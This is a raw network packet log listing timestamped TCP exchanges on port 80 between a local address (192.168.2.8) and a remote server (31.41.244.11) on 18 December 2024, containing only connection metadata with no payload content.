Dec 18, 2024 13:38:13.026087046 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.026114941 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.026133060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.027148962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.027190924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.027224064 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.027264118 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.028095961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.028137922 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.028167963 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.028203011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.028848886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.028891087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.028954983 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.028992891 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.030018091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.030061960 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.030288935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.030329943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.030915022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.030956984 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.031039000 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.031074047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.031869888 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.031910896 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.032119036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.032160044 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.032931089 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.032973051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.033015966 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.033055067 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.034050941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.034064054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.034094095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.034115076 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.035216093 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.035260916 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.035305023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.035343885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.035917997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.035963058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.036020994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.036060095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.036967993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.037008047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.037177086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.037214994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.037827015 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.037867069 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.038024902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.038065910 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.038850069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.038903952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.038917065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.038960934 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.039848089 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.039892912 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.039971113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.040009022 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.040807962 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.040848017 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.040951967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.040999889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.042363882 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.042377949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.042407990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.042427063 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.043200016 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.043212891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.043243885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.043263912 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.044101000 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.044161081 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.044389009 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.044436932 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.045005083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.045017958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.045043945 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.045063019 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.045854092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.045909882 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.045912027 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.045953035 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.046823025 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.046864033 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.046927929 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.046973944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.047820091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.047863007 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.047969103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.048013926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.048847914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.048887968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.048976898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.049017906 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.049897909 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.049940109 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.050019026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.050057888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.050858974 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.050900936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.050906897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.050940990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.191351891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.191445112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.191513062 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.191567898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.191771030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.191823959 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.191873074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.191926003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.192871094 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.192922115 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.193030119 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.193082094 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.193825006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.193878889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.193928003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.193980932 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.194833994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.194885969 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.194998026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.195045948 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.195770979 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.195825100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.195966005 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.196019888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.196849108 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.196904898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.196938992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.196993113 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.197762966 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.197808027 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.197834969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.197881937 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.198772907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.198826075 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.198865891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.198910952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.199883938 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.199938059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.200126886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.200191021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.200850964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.200897932 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.200926065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.200973034 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.201798916 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.201848030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.201889992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.201937914 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.202811003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.202862978 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.202904940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.202951908 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.203778028 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.203828096 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.203958988 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.204009056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.204792976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.204847097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.204894066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.204946995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.205780983 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.205859900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.205941916 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.205991983 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.206753969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.206814051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.206882954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.206952095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.207775116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.207822084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.207866907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.207914114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.208770037 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.208821058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.208837986 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.208888054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.209796906 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.209868908 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.209882021 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.209928989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.210777998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.210833073 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.210920095 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.210978031 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.211905003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.211925030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.211956024 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.211997986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.212769032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.212819099 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.212881088 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.212932110 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.213797092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.213850021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.214039087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.214162111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.214788914 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.214840889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.214936972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.214987040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.215910912 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.215923071 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.216001034 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.216767073 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.216828108 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.216913939 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.216968060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.218061924 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.218127012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.218147993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.218203068 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.218960047 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.219013929 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.219044924 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.219093084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.219780922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.219834089 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.219860077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.219908953 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.220777035 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.220841885 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.221004963 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.221055031 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.221873999 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.221926928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.221973896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.222018957 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.222811937 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.222867966 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.223020077 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.223067999 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.223855019 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.223912954 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.223992109 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.224050045 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.224867105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.224920034 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.224925041 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.224963903 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.225796938 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.225855112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.225963116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.226017952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.226830006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.226877928 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.227031946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.227077961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.227857113 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.227940083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.227946997 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.227987051 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.228868961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.228921890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.229123116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.229168892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.229949951 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.230005026 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.230210066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.230257988 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.230791092 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.230849028 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.230977058 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.231030941 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.231859922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.231874943 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.231909990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.231940985 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.232777119 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.232825994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.232881069 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.232924938 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.233778000 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.233829021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.233977079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.234035015 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.234882116 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.234930992 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.235148907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.235193968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.235778093 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.235825062 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.235949039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.235994101 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.236900091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.236944914 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.236991882 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.237045050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.237982988 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.238027096 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.238087893 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.238126040 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.238842964 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.238883972 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.238933086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.238970041 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.239865065 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.239953995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.239974022 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.240015984 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.240866899 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.240909100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.240979910 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.241019011 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.241883993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.241924047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.242074966 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.242121935 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.242811918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.242852926 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.242911100 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.242947102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.243820906 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.243859053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.383296967 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.383363008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.383373976 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.383408070 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.383747101 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.383781910 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.383807898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.383843899 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.384867907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.384912014 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.385088921 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.385126114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.385202885 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.385247946 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.386102915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.386137962 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.386199951 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.386236906 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.387151003 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.387200117 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.387324095 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.387362003 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:13.388267994 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:13.388281107 CET	80	49708	31.41.244.11	192.168.2.8
